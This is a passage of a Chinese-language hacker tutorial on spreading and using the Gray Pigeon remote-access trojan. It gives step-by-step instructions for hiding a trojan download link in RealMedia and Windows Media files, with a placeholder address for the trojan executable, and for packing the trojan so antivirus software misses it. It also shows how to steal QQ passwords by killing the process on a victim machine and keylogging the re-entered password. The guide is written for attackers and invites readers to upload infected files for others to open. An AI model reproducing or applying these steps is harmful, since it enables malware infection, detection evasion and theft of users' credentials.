黑客新技术 灰鸽子巧妙利用全攻略

次点’文件”---“打开real媒体文件”选择一个RM文件，然后依次点”工具”，“合并事件”我们加入一个事件.好!讲角下.1.txt是干什么的呢，我们打开看下，命令如下u 00:6.0 00:10.0 http://www.baidu.com，这句话的意思是说RM文件播放到第6秒的时候自动打开http://www.baidu.com换成我们木马的地址会是什么样呢?我不敢往下想!最后我们点”文件”下的”REAL文件另存为”即可.我们可以将这个RM文件传到网上，等着人家点击吧.至于real player网页木马生成器，就不介绍了。

下面再来说说怎么用microsoft Media player传播木马，至于原理，就不说了，我们用到的工具是wmdrm，如图.10.先在”自定义打包”，”源文件”，”浏览”处选择一个适合的类型(wmv，wma，asf，wms)然后在”认证字符串”，”认证url” 处填写我们的木马地址http://www.xxx.cc.com/setup.exe，最后我们回到”自定义打包”，在”输出文件后缀”处填写一个合适的反缀.比如.wma，点”打包加密”文件就生成了.我们打开刚才生成的文件会出现如图11所示的情形，如果点确定.那么播放器就会下载我们木马运行了。

五、给灰鸽子木马加壳躲避查毒软件

工具:三层驱动sa.exe

灰鸽子虽然功能强大.但俗话说的好:人性出名猪怕壮.灰鸽子不能躲避杀毒软件的查杀.当然灰鸽子自身也带UPX加壳功能.我们在配置服务端的时候都一般不选择UPX加壳.而是喜欢手动加壳.网上加壳工具很多.我们今天用三层驱动SA为鸽子加壳。如图.在”目标文件”处选择服务端文件，然后在”选项”处选择加壳级别.可加壳三回.但是需从A级一步一步加壳.这样我们的鸽子就不会被杀了.当然还有很多工具比此工具强大.它们原理基本都是一样的.在此我们不举例了。

六、用灰鸽子盗QQ密码

工具:无

盗QQ密码前提是我们已经控制了一台灰鸽子肉鸡，并且肉鸡上面运行了QQ.如果你满足这样的条件那就随我来吧!我们依次选择”远程控制命令”---“进程管理”，可先看看肉鸡是否运行了QQ.当确定运行后我们选择QQ进程，点“终止进程”，然后依次点“键盘记录”，”启动击键记录.”当然，我们此时还可以查看对方屏幕，观察对方有什么反应。等对方将密码输入完毕后我们依次点”终止击键记录”，“查看击键记录”，这样对方的密码就呈现在我们眼前了。